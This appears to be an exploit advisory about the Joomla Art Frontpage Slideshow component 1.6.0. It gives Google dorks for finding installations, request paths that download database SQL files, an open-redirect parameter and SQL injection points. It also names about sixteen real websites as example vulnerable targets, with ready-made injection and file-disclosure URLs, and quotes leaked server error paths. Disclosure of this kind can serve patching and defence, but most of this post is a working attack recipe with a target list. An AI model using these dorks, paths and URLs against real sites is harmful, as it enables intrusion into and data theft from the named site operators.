facebook facebook twitter rss

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################################################

# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
inurl:''/administrator/components/com_fpss/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################################################

Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection

####################################################################################################

# Description :
*************

Art Frontpage Slideshow is a slideshow module that adds front end animation
that attracts visitors and allows to show images of featured products
and news in a nice eye-catching way.

####################################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql
/administrator/components/com_fpss/install.mysql.sql

# Open Redirection Exploit :
*************************

/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]

# SQL Injection Exploit :
***********************
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]

/index.php?option=com_fpss&task=module&id=[ID-NUMBER]
&format=feed&type=atom&lang=[SQL Injection]

/index.php?option=com_fpss&view=article&id=[ID-NUMBER]
:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]

####################################################################################################

# Example Vulnerable Sites :
*************************

[+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27

[+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27

[+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27

[+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql

[+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql

[+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql

[+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql

[+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql

[+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql

[+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql

[+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql

[+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql

[+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql

[+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql

[+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql

[+] marinelog.com/administrator/components/com_fpss/install.mysql.sql

####################################################################################################

# Example SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie -
headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1)
in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423

Strict Standards: Non-static method JLoader::import() should
not be called statically in /home/uadvirtual/public_html/main
/libraries/joomla/import.php on line 29

####################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################################################

Like us on Facebook :